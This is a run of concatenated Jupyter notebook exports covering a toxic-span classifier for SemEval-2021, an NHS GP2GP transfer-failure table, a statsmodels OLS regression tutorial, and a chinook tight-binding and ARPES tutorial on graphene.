spans[i] = str(spans[i])
if spans[i]!='[]':
spans[i] = spans[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
spans[i] = spans[i].split(', ')
spans[i] = [int(sp) for sp in spans[i]]
else:
spans[i] = []
for i in range(1, df.shape[0]):
tokens[i] = str(tokens[i])
if tokens[i]!='[]':
tokens[i] = tokens[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
tokens[i] = tokens[i].split(', ')
#tokens[i] = [int(sp) for sp in tokens[i]]
else:
tokens[i] = []
for i in range(1, df.shape[0]):
is_toxic[i] = str(is_toxic[i])
if is_toxic[i]!='[]':
is_toxic[i] = is_toxic[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
is_toxic[i] = is_toxic[i].split(', ')
is_toxic[i] = [int(sp) for sp in is_toxic[i]]
else:
is_toxic[i] = []
train_sample = []
#train_sample.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
num = 0
for i in range(1, spans.shape[0]):
if i%1000==0:
print(i)
for j, token in enumerate(tokens[i]):
if len(token)>=3:
train_sample.append([is_toxic[i][j], token, wordnet_lemmatizer.lemmatize(token), i, texts[i]])
train_sample = pd.DataFrame(train_sample).sample(frac=1).values
# Build a class-balanced sample: keep every toxic token but cap the number of
# non-toxic tokens via the num counter (20856 presumably matches the toxic count)
train_sample_short = []
train_sample_short.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
for tr in train_sample:
if tr[0]==1:
train_sample_short.append(tr)
else:
if num<=20856:
train_sample_short.append(tr)
num+=1
pd.DataFrame(train_sample_short).to_csv('tsd_train_fnn.csv')
print(len(train_sample_short))
train_sample = []
train_sample.append(['is_toxic', 'token', 'token_lemmatized', 'text_id', 'text'])
num = 0
for i in range(1, spans.shape[0]):
if i%1000==0:
print(i)
for j, token in enumerate(tokens[i]):
if len(token)>=3:
train_sample.append([is_toxic[i][j], token, wordnet_lemmatizer.lemmatize(token), i, texts[i]])
pd.DataFrame(train_sample).to_csv('tsd_trial_fnn.csv')
print(len(train_sample))
###Output
_____no_output_____
###Markdown
Get BERT embeddings for the texts
###Code
df = pd.read_csv('/content/tsd_trial.csv')
print(df.shape)
df.head()
model = SentenceTransformer('distilbert-base-nli-mean-tokens')
sentences = df['text'].values
sentence_embeddings = model.encode(sentences)
print(sentences[0])
print(len(sentence_embeddings[0]))
print(sentence_embeddings[0])
with open('/content/drive/My Drive/semeval21/sentence_embs_trial.pickle', 'wb') as f:
pickle.dump(sentence_embeddings, f)
###Output
_____no_output_____
###Markdown
Get embeddings for the words
###Code
df = pd.read_csv('/content/tsd_train_fnn.csv', index_col=0, header=1)
print(df.shape)
df.head()
words = set()
for el in df['token_lemmatized'].values:
words.add(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')))
print(len(words))
df = pd.read_csv('/content/tsd_trial_fnn.csv', index_col=0, header=1)
print(df.shape)
df.head()
for el in df['token_lemmatized'].values:
words.add(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')))
print(len(words))
fname = '/content/drive/My Drive/english_w2v/model.bin'
w2v = KeyedVectors.load_word2vec_format(fname, binary=True)
words = list(words)
print(words[:5])
embs = []
new_words = []
for w in words:
try:
embs.append(w2v[w])
new_words.append(w)
except:
pass
print(len(embs))
with open('/content/drive/My Drive/semeval21/word2vec_words.pickle', 'wb') as f:
pickle.dump(new_words, f)
with open('/content/drive/My Drive/semeval21/word2vec_embs.pickle', 'wb') as f:
pickle.dump(embs, f)
###Output
_____no_output_____
###Markdown
Build the training set: word embedding + sentence embedding
###Code
df = pd.read_csv('/content/tsd_trial_fnn.csv', index_col=0, header =1)
df.head()
list_words =[]
for el in df['token_lemmatized'].values:
list_words.append(wordnet_lemmatizer.lemmatize(el.lower().replace('.','').replace(' ','')) )
print(len(list_words))
with open('/content/drive/My Drive/semeval21/word2vec_words.pickle', 'rb') as f:
words = pickle.load(f)
with open('/content/drive/My Drive/semeval21/word2vec_embs.pickle', 'rb') as f:
embs = pickle.load(f)
with open('/content/drive/My Drive/semeval21/sentence_embs_trial.pickle', 'rb') as f:
sentence_embs = pickle.load(f)
train_data = []
train_labels = []
texts_words = []
words_set = set(words)
for i,el in enumerate(df.values):
if list_words[i] in words_set:
elem = np.concatenate((embs[words.index(list_words[i])], sentence_embs[el[3]-1]))
train_labels.append(el[0])
train_data.append(elem)
texts_words.append([el[1],el[4]])
print(len(train_data))
print(len(train_labels))
print(train_data[0])
print(train_labels[0])
with open('/content/drive/My Drive/semeval21/test_data.pickle', 'wb') as f:
pickle.dump(train_data, f)
with open('/content/drive/My Drive/semeval21/test_labels.pickle', 'wb') as f:
pickle.dump(train_labels, f)
with open('/content/drive/My Drive/semeval21/test_key.pickle', 'wb') as f:  # named to match the test_* dumps above; loaded as test_key below
pickle.dump(texts_words, f)
###Output
_____no_output_____
###Markdown
Classifier
###Code
import keras
from keras import Sequential
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.layers import Input, Embedding, Activation, Flatten, Dense, concatenate
from keras.models import Model
with open('/content/drive/My Drive/semeval21/test_data.pickle', 'rb') as f:
test_data = pickle.load(f)
with open('/content/drive/My Drive/semeval21/test_labels.pickle', 'rb') as f:
test_labels = pickle.load(f)
with open('/content/drive/My Drive/semeval21/train_data.pickle', 'rb') as f:
train_data = pickle.load(f)
with open('/content/drive/My Drive/semeval21/train_labels.pickle', 'rb') as f:
train_labels = pickle.load(f)
print(len(train_data))
print(len(train_labels))
print(len(test_data))
print(len(test_labels))
#labels to categorical
train_labels = keras.utils.to_categorical(np.array(train_labels),2)
test_labels = keras.utils.to_categorical(np.array(test_labels),2)
inputs=Input(shape=(len(train_data[0]),), name='input')
x=Dense(1024, activation='tanh', name='fully_connected_1024_tanh')(inputs)
#x=Dense(1024, activation='tanh', name='fully_connected_32')(x)
predictions=Dense(2, activation='softmax', name='output_softmax')(x)
model=Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
from sklearn.metrics import accuracy_score, f1_score, recall_score, precision_score
history = model.fit(np.array(train_data), train_labels, epochs=1, verbose=2,\
validation_data=(np.array(test_data), test_labels))
predict = np.argmax(model.predict(np.array(test_data)), axis=1)
answer = np.argmax(test_labels, axis=1)
f1_token=f1_score(predict, answer)*100  # renamed: a plain 'f1' would shadow the span-level f1() imported from toxic_spans
prec=precision_score(predict, answer)*100
recall=recall_score(predict, answer)*100
accuracy=accuracy_score(predict, answer)*100
print('Done!')
print('f1 = {}, accuracy = {}, precision = {}, recall = {}'.format(f1_token,accuracy,prec,recall))
with open('/content/drive/My Drive/semeval21/test_key.pickle', 'rb') as f:
test_key = pickle.load(f)
print(test_key[0])
df = pd.read_csv('/content/tsd_trial.csv')
df.head()
final_spans = []
for text in df['text'].values:
spans = []
for i, elem in enumerate(test_key):
if elem[1]==text and predict[i]==1:
pos = elem[1].find(elem[0])
if pos>=0:
for j in range(pos,pos+len(elem[0])):
spans.append(j)
final_spans.append(spans)
print(final_spans[:20])
df = pd.read_csv('/content/tsd_trial.csv')
from ast import literal_eval
df.spans = df.spans.apply(literal_eval)
df['predictions'] = pd.Series(final_spans)
#df["f1_scores"] = df.apply(lambda row: f1(row.predictions, row.spans), axis=1)
df.head()
df.to_csv('/content/drive/My Drive/semeval21/res_4929_w2v_dist.csv')
f1_scores = []
for i in range(690):
f1_scores.append(f1(df['spans'][i],df['predictions'][i]))
np.mean(np.array(f1_scores))
###Output
_____no_output_____
notebooks/63-PRMT-2324--high-level-table-with-for-2-weeks-august.ipynb
###Markdown
## PRMT-2324 Run top level table for first 2 weeks of August 2021

### Context

In our July data we saw a significant increase in GP2GP failures. We want to understand whether these were blips, perhaps caused by something that happened during July, or whether these failures are continuing. We don't want to wait until we have all August data to identify this, as we are starting conversations with suppliers now.
###Code
import pandas as pd
import numpy as np
from datetime import datetime
transfer_file_location = "s3://prm-gp2gp-notebook-data-prod/PRMT-2324-2-weeks-august-data/transfers/v4/2021/8/transfers.parquet"
transfers_raw = pd.read_parquet(transfer_file_location)
transfers_raw.head()
# filter data to just include the first 2 weeks (15 days) of august
date_filter_bool = transfers_raw["date_requested"] < datetime(2021, 8, 16)
transfers_half_august = transfers_raw[date_filter_bool]
# Supplier data was only available from Feb/Mar 2021. Sending and requesting supplier values for all transfers before that are empty
# Dropping these columns to merge supplier data from ASID lookup files
transfers_half_august = transfers_half_august.drop(["sending_supplier", "requesting_supplier"], axis=1)
transfers = transfers_half_august.copy()
# Supplier name mapping
supplier_renaming = {
"EGTON MEDICAL INFORMATION SYSTEMS LTD (EMIS)":"EMIS",
"IN PRACTICE SYSTEMS LTD":"Vision",
"MICROTEST LTD":"Microtest",
"THE PHOENIX PARTNERSHIP":"TPP",
None: "Unknown"
}
# Generate ASID lookup that contains all the most recent entry for all ASIDs encountered
asid_file_location = "s3://prm-gp2gp-asid-lookup-preprod/2021/6/asidLookup.csv.gz"
asid_lookup = pd.read_csv(asid_file_location)
asid_lookup = asid_lookup.drop_duplicates().groupby("ASID").last().reset_index()
lookup = asid_lookup[["ASID", "MName"]]
transfers = transfers.merge(lookup, left_on='requesting_practice_asid',right_on='ASID',how='left')
transfers = transfers.rename({'MName': 'requesting_supplier', 'ASID': 'requesting_supplier_asid'}, axis=1)
transfers = transfers.merge(lookup, left_on='sending_practice_asid',right_on='ASID',how='left')
transfers = transfers.rename({'MName': 'sending_supplier', 'ASID': 'sending_supplier_asid'}, axis=1)
transfers["sending_supplier"] = transfers["sending_supplier"].replace(supplier_renaming.keys(), supplier_renaming.values())
transfers["requesting_supplier"] = transfers["requesting_supplier"].replace(supplier_renaming.keys(), supplier_renaming.values())
# Making the status to be more human readable here
transfers["status"] = transfers["status"].str.replace("_", " ").str.title()
import paths
import data
error_code_lookup_file = pd.read_csv(data.gp2gp_response_codes.path)
outcome_counts = transfers.fillna("N/A").groupby(by=["status", "failure_reason"]).agg({"conversation_id": "count"})
outcome_counts = outcome_counts.rename({"conversation_id": "Number of transfers", "failure_reason": "Failure Reason"}, axis=1)
outcome_counts["% of transfers"] = (outcome_counts["Number of transfers"] / outcome_counts["Number of transfers"].sum()).multiply(100)
outcome_counts.round(2)
transfers['month']=transfers['date_requested'].dt.to_period('M')
def convert_error_list_to_tuple(error_code_list, error_code_type):
return [(error_code_type, error_code) for error_code in set(error_code_list) if not np.isnan(error_code)]
def combine_error_codes(row):
sender_list = convert_error_list_to_tuple(row["sender_error_codes"], "Sender")
intermediate_list = convert_error_list_to_tuple(row["intermediate_error_codes"], "COPC")
final_list = convert_error_list_to_tuple(row["final_error_codes"], "Final")
full_error_code_list = sender_list + intermediate_list + final_list
if len(full_error_code_list) == 0:
return [("No Error Code", "No Error")]
else:
return full_error_code_list
transfers["all_error_codes"] = transfers.apply(combine_error_codes, axis=1)
def generate_high_level_table(transfers_sample):
# Break up lines by error code
transfers_split_by_error_code=transfers_sample.explode("all_error_codes")
# Create High level table
high_level_table=transfers_split_by_error_code.fillna("N/A").groupby(["requesting_supplier","sending_supplier","status","failure_reason","all_error_codes"]).agg({'conversation_id':'count'})
high_level_table=high_level_table.rename({'conversation_id':'Number of Transfers'},axis=1).reset_index()
# Count % of transfers
total_number_transfers = transfers_sample.shape[0]
high_level_table['% of Transfers']=(high_level_table['Number of Transfers']/total_number_transfers).multiply(100)
# Count by supplier pathway
supplier_pathway_counts = transfers_sample.fillna("Unknown").groupby(by=["sending_supplier", "requesting_supplier"]).agg({"conversation_id": "count"})['conversation_id']
high_level_table['% Supplier Pathway Transfers']=high_level_table.apply(lambda row: row['Number of Transfers']/supplier_pathway_counts.loc[(row['sending_supplier'],row['requesting_supplier'])],axis=1).multiply(100)
# Add in Paper Fallback columns
total_fallback = transfers_sample["failure_reason"].dropna().shape[0]
fallback_bool=high_level_table['status']!='Integrated On Time'
high_level_table.loc[fallback_bool,'% Paper Fallback']=(high_level_table['Number of Transfers']/total_fallback).multiply(100)
# % of error codes column
total_number_of_error_codes=transfers_split_by_error_code['all_error_codes'].value_counts().drop(('No Error Code','No Error')).sum()
error_code_bool=high_level_table['all_error_codes']!=('No Error Code', 'No Error')
high_level_table.loc[error_code_bool,'% of error codes']=(high_level_table['Number of Transfers']/total_number_of_error_codes).multiply(100)
# Adding columns to describe errors
high_level_table['error_type']=high_level_table['all_error_codes'].apply(lambda error_tuple: error_tuple[0])
high_level_table['error_code']=high_level_table['all_error_codes'].apply(lambda error_tuple: error_tuple[1])
high_level_table=high_level_table.merge(error_code_lookup_file[['ErrorCode','ResponseText']],left_on='error_code',right_on='ErrorCode',how='left')
# Select and re-order table
grouping_columns_order=['requesting_supplier','sending_supplier','status','failure_reason','error_type','ResponseText','error_code']
counting_columns_order=['Number of Transfers','% of Transfers','% Supplier Pathway Transfers','% Paper Fallback','% of error codes']
high_level_table=high_level_table[grouping_columns_order+counting_columns_order].sort_values(by='Number of Transfers',ascending=False)
return high_level_table
with pd.ExcelWriter("High Level Table First 2 weeks of August PRMT-2324.xlsx") as writer:
generate_high_level_table(transfers.copy()).to_excel(writer, sheet_name="All",index=False)
[generate_high_level_table(transfers[transfers['month']==month].copy()).to_excel(writer, sheet_name=str(month),index=False) for month in transfers['month'].unique()]
###Output
_____no_output_____
Linear_Regression/OLS_Statsmodels.ipynb
###Markdown
## Regression formula

Looks like you're good for the linearity assumption, and additionally, the distributions for height and weight look reasonable (and even pretty normal!). Now, let's run the regression. Statsmodels allows users to fit statistical models using R-style formulas. The formula framework is quite powerful, and for simple regression it is written using a ~ as Y ~ X. The formula gives instruction for a general structure for a regression call. For a statsmodels ols call, you'll need a Pandas dataframe with column names that you will add to your formula.
###Code
f = 'weight~height'
###Output
_____no_output_____
###Markdown
You can then pass the formula with variable names to ols() along with fit() to fit a linear model to the given variables.
###Code
model = ols(formula=f, data=df).fit()
###Output
_____no_output_____
###Markdown
Now, you can go ahead and inspect your fitted model in many ways. First, let's get a summary of what the model contains using model.summary()
###Code
model.summary()
###Output
_____no_output_____
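###Markdown
Before unpacking the table below, note that every number in it is also exposed programmatically on the fitted results object, which is handy when building reports. A minimal sketch (these attribute names come from the statsmodels OLSResults API):
###Code
# Pull individual statistics straight from the fitted model
print(model.rsquared)      # coefficient of determination
print(model.rsquared_adj)  # adjusted R-squared
print(model.params)        # intercept and slope estimates
print(model.pvalues)       # p-values for each coefficient
print(model.conf_int())    # 95% confidence intervals
###Output
_____no_output_____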
###Markdown
Warnings: [1] Standard Errors assume that the covariance matrix of the errors is correctly specified.

Wow, that's a lot of information. Statsmodels performs a ton of tests and calculates measures to identify goodness of fit.

- You can find the R-Squared, which is 0.95, i.e. the data are very linearly related
- You can also look at the coefficients of the model for intercept and slope (next to "height")
- Kurtosis and Skew values are shown here
- A lot of significance testing is being done here

Here is a brief description of these measures:

The left part of the first table gives some specifics on the data and the model:

- Dep. Variable: Singular. Which variable is the point of interest of the model
- Model: Technique used, an abbreviated version of Method (see methods for more).
- Method: The loss function optimized in the parameter selection process. Least Squares since it picks the parameters that reduce the training error. This is also known as Mean Square Error [MSE].
- No. Observations: The number of observations used by the model, or size of the training data.
- Degrees of Freedom Residuals: Degrees of freedom of the residuals, which is the number of observations – number of parameters. Intercept is a parameter. The purpose of Degrees of Freedom is to reflect the impact of descriptive/summarizing statistics in the model, which in regression is the coefficient. Since the observations must "live up" to these parameters, they only have so many free observations, and the rest must be reserved to "live up" to the parameters' prophecy. This internal mechanism ensures that there are enough observations to match the parameters.
- Degrees of Freedom Model: The number of parameters in the model (not including the constant/intercept term if present)
- Covariance Type: Robust regression methods are designed to be not overly affected by violations of assumptions by the underlying data-generating process. Since this model is Ordinary Least Squares, it is non-robust and therefore highly sensitive to outliers.

The right part of the first table shows the goodness of fit:

- R-squared: The coefficient of determination, the Sum Squares of Regression divided by Total Sum Squares. This translates to the percent of variance explained by the model. The remaining percentage represents the variance explained by error, the E term, the part that model and predictors fail to grasp.
- Adj. R-squared: Version of the R-Squared that penalizes additional independent variables.
- F-statistic: A measure of how significant the fit is. The mean squared error of the model divided by the mean squared error of the residuals. Feeds into the calculation of the P-Value.
- Prob (F-statistic) or P-Value: The probability that a sample like this would yield the above statistic, and whether the model's verdict on the null hypothesis will consistently represent the population. Does not measure effect magnitude, instead measures the integrity and consistency of this test on this group of data.
- Log-likelihood: The log of the likelihood function.
- AIC: The Akaike Information Criterion. Adjusts the log-likelihood based on the number of observations and the complexity of the model. Penalizes the model selection metrics when more independent variables are added.
- BIC: The Bayesian Information Criterion. Similar to the AIC, but has a higher penalty for models with more parameters. Penalizes the model selection metrics when more independent variables are added.

The second table shows the coefficient report:

- coef: The estimated value of the coefficient. By how much the model multiplies the independent value by.
- std err: The basic standard error of the estimate of the coefficient. Average distance deviation of the points from the model, which offers a unit relevant way to gauge model accuracy.
- t: The t-statistic value. This is a measure of how statistically significant the coefficient is.
- P > |t|: P-value that the null-hypothesis that the coefficient = 0 is true. If it is less than the confidence level, often 0.05, it indicates that there is a statistically significant relationship between the term and the response.
- [95.0% Conf. Interval]: The lower and upper values of the 95% confidence interval. Specific range of the possible coefficient values.

The third table shows information about the residuals, autocorrelation, and multicollinearity:

- Skewness: A measure of the symmetry of the data about the mean. Normally-distributed errors should be symmetrically distributed about the mean (equal amounts above and below the line). The normal distribution has 0 skew.
- Kurtosis: A measure of the shape of the distribution. Compares the amount of data close to the mean with those far away from the mean (in the tails), so model "peakiness". The normal distribution has a Kurtosis of 3, and the greater the number, the more the curve peaks.
- Omnibus D'Angostino's test: Provides a combined statistical test for the presence of skewness and kurtosis.
- Prob(Omnibus): The above statistic turned into a probability
- Jarque-Bera: A different test of the skewness and kurtosis
- Prob (JB): The above statistic turned into a probability
- Durbin-Watson: A test for the presence of autocorrelation (that the errors are not independent), which is often important in time-series analysis
- Cond. No: A test for multicollinearity (if in a fit with multiple parameters, the parameters are related to each other).

The interpretation of some of these measures will be explained in the next lessons. For others, you'll get a better insight into them in the lessons on statistics.

## Visualize error terms

You can also plot some visualizations to check the regression assumptions with respect to the error terms. You'll use sm.graphics.plot_regress_exog() for some built-in visualization capabilities of statsmodels. Here is how to do it:
###Code
fig = plt.figure(figsize=(15,8))
fig = sm.graphics.plot_regress_exog(model, "height", fig=fig)
plt.show()
###Output
_____no_output_____
###Markdown
For the four graphs we see above:

- The Y and Fitted vs. X graph plots the dependent variable against our predicted values with a confidence interval. The positive relationship shows that height and weight are correlated, i.e., when one variable increases the other increases.
- The Residuals versus height graph shows our model's errors versus the specified predictor variable. Each dot is an observed value; the line represents the mean of those observed values. Since there's no pattern in the distance between the dots and the mean value, the OLS assumption of homoskedasticity holds.
- The Partial regression plot shows the relationship between height and weight, taking into account the impact of adding other independent variables on our existing height coefficient. You'll later learn how this same graph changes when you add more variables.
- The Component and Component Plus Residual (CCPR) plot is an extension of the partial regression plot. It shows where the trend line would lie after adding the impact of adding our other independent variables on the weight.

## Q-Q Plots

To check for the normality assumption, you can obtain error terms (residuals) from the model and draw a Q-Q Plot against a standard normal distribution as shown below. While the residuals do not seem to match up perfectly with the red line, there seem to be no super clear deviations from the red line. So you can assume that you're OK for the normality assumption.
###Code
import scipy.stats as stats
residuals = model.resid
fig = sm.graphics.qqplot(residuals, dist=stats.norm, line='45', fit=True)
fig.show()
###Output
<ipython-input-15-8c4a1944e451>:4: UserWarning: Matplotlib is currently using module://ipykernel.pylab.backend_inline, which is a non-GUI backend, so cannot show the figure.
fig.show()
docs/build/html/_downloads/1abc96ce83e8f776d77fd3006a49c258/QMI Student Seminar-Graphene.ipynb
###Markdown
## Introduction to Chinook with Graphene

In the following exercise, we'll get a feeling for building and characterizing tight-binding models in chinook, in addition to some calculation of the associated ARPES intensity. I'll use graphene for this exercise. I'll start by importing the requisite python libraries -- including the necessary chinook files. Numpy is the standard python numerics package.
###Code
import numpy as np
import chinook.build_lib as build_lib
import chinook.ARPES_lib as arpes_lib
import chinook.operator_library as op_lib
import chinook.orbital_plotting as oplot
###Output
_____no_output_____
###Markdown
Personally, I like to keep my model setup and my calculation execution in separate .py scripts. For the sake of code readability this helps a lot. For this Jupyter notebook though, I'm going to do things sort of linearly. It gets a bit cluttered, but will help with the flow. Have a look at the .py files saved on the same page as this notebook for the same exercises written in native python scripts. To define a tight-binding model, I'll need four things: a lattice, an orbital basis, a Hamiltonian, and a momentum path of interest. We start with the lattice.
###Code
alatt = 2.46
interlayer = 100.0
avec = np.array([[-alatt/2,alatt*np.sqrt(3/4.),0.0],
[alatt/2,alatt*np.sqrt(3/4.),0.0],
[0.0,0.0,interlayer]])
###Output
_____no_output_____
###Markdown
Even though we are working with a 2D lattice, it's embedded in the 3D space we live in. I've then defined an 'interlayer' distance, but this is fictitiously large so there will not be any 'interlayer' coupling. Next, we define our orbital basis:
###Code
spin_args = {'bool':False}
basis_positions = np.array([[0.0,0.0,0.0],
[0.0,alatt/np.sqrt(3.0),0.0]])
basis_args = {'atoms':[0,0],
'Z':{0:6},
'orbs':[["20","21x","21y","21z"],["20","21x","21y","21z"]],
'pos':basis_positions,
'spin':spin_args}
###Output
_____no_output_____
###Markdown
I'm going to ignore the spin-degree of freedom so I'm turning off the spin-switch. In other systems, these 'spin_args' allow for incorporation of spin-orbit coupling and magnetic ordering. The graphene lattice has two basis atoms per unit cell, and for now I'll include the full Carbon 2sp orbital space. This is a good point to clarify that most objects we define in chinook are generated using the 'dictionary' structure I've used here, where we use key-value pairs to define attributes in a user-readable fashion. After the basis, I'll define my Hamiltonian. Following the introduction to Slater-Koster tight-binding, I define the relevant hoppings in the SK dictionary. The keys specify the atoms and orbitals associated with the hopping value. For example, '002211P' corresponds to the $V_{pp\pi}$ hopping between the 0$^{th}$ and 0$^{th}$ atom in our basis, coupling specifically the 2p (n=2, l=1) states.
###Code
SK = {"020":-8.81,"021":-0.44, #onsite energies
"002200S":-5.279, #nearest-neighbour Vssσ
"002201S":5.618, #nearest-neighbour Vspσ
"002211S":6.05,"002211P":-3.07} #nearest-neighbour Vppσ,Vppπ
hamiltonian_args = {'type':'SK',
'V':SK,
'avec':avec,
'cutoff':alatt*0.7,
'spin':spin_args}
###Output
_____no_output_____
###Markdown
Before building our model, the last thing I'll do is specify a k-path along which I want to find the band-structure.
###Code
G = np.array([0,0,0])
K = np.array([1./3,2./3,0])
M = np.array([0,0.5,0.0])
momentum_args= {'type':'F',
'avec':avec,
'grain':200,
'pts':[G,K,M,G],
'labels':['$\\Gamma$','K','M','$\\Gamma$']}
###Output
_____no_output_____
###Markdown
Finally then, I'll use the chinook.build_library to actually construct a tight-binding model for our use here
###Code
basis = build_lib.gen_basis(basis_args)
kpath = build_lib.gen_K(momentum_args)
TB = build_lib.gen_TB(basis,hamiltonian_args,kpath)
###Output
_____no_output_____
###Markdown
With this model so defined, I can now compute the eigenvalues along my k-path of interest:
###Code
TB.solve_H()
TB.plotting()
###Output
_____no_output_____
###Markdown
We see very nicely then the linear Dirac dispersion for which graphene is so famous, in addition to the sigma-bonding states at higher energies below $E_F$, composed of sp$_2$ hybrids, from which its mechanical strength is derived. Note also that I've chosen to n-dope my graphene, shifting the Dirac point below the chemical potential. Such a shift is routinely observed in graphene which is not free-standing, as typically used in ARPES experiments. To understand the orbital composition more explicitly, I can compute the projection of the tight-binding eigenvectors onto the orbitals of my basis using the chinook.operator_library. Before doing so, I'll use a built-in method of the TB model object we've created to display my orbital basis clearly:
###Code
TB.print_basis_summary()
###Output
Index | Atom | Label | Spin | Position
================================================
0 | 0 |20 | 0.5| 0.000,0.000,0.000
1 | 0 |21x | 0.5| 0.000,0.000,0.000
2 | 0 |21y | 0.5| 0.000,0.000,0.000
3 | 0 |21z | 0.5| 0.000,0.000,0.000
4 | 0 |20 | 0.5| 0.000,1.420,0.000
5 | 0 |21x | 0.5| 0.000,1.420,0.000
6 | 0 |21y | 0.5| 0.000,1.420,0.000
7 | 0 |21z | 0.5| 0.000,1.420,0.000
###Markdown
Clearly, orbitals [0,4] are 2s, [1,5] are 2p$_x$, [2,6] are 2p$_y$ and [3,7] are 2p$_z$. I'll use the op_lib.fatbs function to plot 'fat' bands for these basis combinations:
###Code
C2s = op_lib.fatbs([0,4],TB,Elims=(-30,15))
C2x = op_lib.fatbs([1,5],TB,Elims=(-30,15))
C2y = op_lib.fatbs([2,6],TB,Elims=(-30,15))
C2z = op_lib.fatbs([3,7],TB,Elims=(-30,15))
###Output
_____no_output_____
###Markdown
From these results, it's immediatedly obvious that if I am only concerned with the low-energy physics near the chemical potential (within $\pm$ 3 eV), then it is perfectly reasonable to adopt a model with only p$_z$ orbitals. I can actually redefine my model accordingly.
###Code
basis_args = {'atoms':[0,0],
'Z':{0:6},
'orbs':[["21z"],["21z"]],
'pos':basis_positions,
'spin':spin_args}
basis = build_lib.gen_basis(basis_args)
TB_pz = build_lib.gen_TB(basis,hamiltonian_args,kpath)
TB_pz.solve_H()
TB_pz.plotting()
###Output
_____no_output_____
###Markdown
The only difference in the above was that I redefined the "orbs" argument for the basis definition, cutting out the "20", "21x", "21y" states. There is some redundancy left in this model, specifically I have defined additional hopping elements and onsite energies (for the 2s) which will not be used. Let's shift our attention to ARPES. In ARPES experiments, one usually only sees one side of the Dirac cone. This is due to interference between the two sublattice sites. To understand this, we can plot directly the tight-binding eigenvectors near the K-point. Since we defined our k-path with 200 points between each high-symmetry point, I'll plot the eigenvectors at the 190$^{th}$ k-point.
###Code
eigenvector1 = TB_pz.Evec[190,:,0]
eigenvector2 = TB_pz.Evec[190,:,1]
wfunction1 = oplot.wavefunction(basis=TB_pz.basis,vector=eigenvector1)
wfunction2 = oplot.wavefunction(basis=TB_pz.basis,vector=eigenvector2)
wplot1 = wfunction1.triangulate_wavefunction(20)
wplot2 = wfunction2.triangulate_wavefunction(20)
###Output
/Users/ryanday/anaconda3/lib/python3.7/site-packages/matplotlib/figure.py:2299: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
warnings.warn("This figure includes Axes that are not compatible "
###Markdown
We see that the lower-energy state is the symmetric combination of sites $A$ and $B$, whereas the higher energy state is the antisymmetric combination. So we can anticipate that the symmetric state will produce constructive interference, whereas the antisymmetric will destructively interfere. Ok, let's continue with this model to calculate the ARPES spectra.
###Code
Kpt = np.array([1.702,0.0,0.0])
klimits = 0.1
Elimits = [-1.25,0.25]
Npoints = 100
arpes_args={'cube':{'X':[Kpt[0]-klimits,Kpt[0]+klimits,Npoints],
'Y':[Kpt[1]-klimits,Kpt[1]+klimits,Npoints],
'kz':Kpt[2],
'E':[Elimits[0],Elimits[1],1000]},
'SE':['poly',0.01,0,0.1], #Self-energy arguments (lineshape)
'hv': 21.2, # Photon energy (eV)
'pol':np.array([-1,0,1]), #light-polarization
'resolution':{'E':0.02,'k':0.005}, #energy, momentum resolution
'T':4.2} #Temperature (for Fermi distribution)
experiment = arpes_lib.experiment(TB_pz,arpes_args)
experiment.datacube()
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('y',0))
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('E',0))
Imap,Imap_resolution,axes = experiment.spectral(slice_select=('x',Kpt[0]))
###Output
_____no_output_____
###Markdown
I can also compare the result against what I would have with my larger basis size.
###Code
experiment_fullbasis = arpes_lib.experiment(TB,arpes_args)
experiment_fullbasis.datacube()
Imap,Imap_resolution,axes = experiment_fullbasis.spectral(slice_select=('x',Kpt[0]))
###Output
Initiate diagonalization:
Large memory load: splitting diagonalization into 2 segments
Diagonalization Complete.
Begin computing matrix elements:
||||||||||||||||||||||||||||||100%
Done matrix elements
###Markdown
Perhaps unsurprisingly, the result is the same, as symmetries of the 2D lattice preclude hybridization of the Carbon 2p$_z$ orbitals with any of the other 2sp states. Manipulating the Hamiltonian We can go beyond here and now start playing with our Hamiltonian. One possibility is to consider the effect of breaking inversion symmetry by imposing an onsite energy difference between the two Carbon sites. This is the familiar Semenoff mass proposed by UBC's Gordon Semenoff, as it modifies the massless Dirac dispersion near the K-point to become massive. I will define a simple helper function for this task:
###Code
def semenoff_mass(TB,mass):
    # Each entry follows chinook's [index1, index2, x, y, z, value] convention:
    # an onsite energy of +mass/2 on sublattice A and -mass/2 on sublattice B
    Hnew = [[0,0,0,0,0,mass/2],
            [1,1,0,0,0,-mass/2]]
    TB.append_H(Hnew)
###Output
_____no_output_____
###Markdown
I can then call this function, acting on the pz-only model:
###Code
TB_semenoff = build_lib.gen_TB(basis,hamiltonian_args,kpath)
semenoff_mass(TB_semenoff,0.5)
TB_semenoff.Kobj = kpath
TB_semenoff.solve_H()
TB_semenoff.plotting()
###Output
_____no_output_____
###Markdown
By breaking inversion symmetry in the crystal, I have opened a gap at the K-point. The Dirac point need only be degenerate if both inversion and time reversal symmetries are preserved. Note that I have redefined my kpath to follow the same points as before, as the ARPES calculations impose the mesh of k-points used. Near the k-point, rather than have 'bonding' and 'anti-bonding' character, the Semenoff mass localizes the the wavefunction on one or the other sites. Printing the orbital wavefunction near K for the lower and upper states:
###Code
eigenvector1 = TB_semenoff.Evec[190,:,0]
eigenvector2 = TB_semenoff.Evec[190,:,1]
wfunction1 = oplot.wavefunction(basis=TB_semenoff.basis,vector=eigenvector1)
wfunction2 = oplot.wavefunction(basis=TB_semenoff.basis,vector=eigenvector2)
wplot1 = wfunction1.triangulate_wavefunction(20)
wplot2 = wfunction2.triangulate_wavefunction(20)
###Output
/Users/ryanday/anaconda3/lib/python3.7/site-packages/matplotlib/figure.py:2299: UserWarning: This figure includes Axes that are not compatible with tight_layout, so results might be incorrect.
warnings.warn("This figure includes Axes that are not compatible "
###Markdown
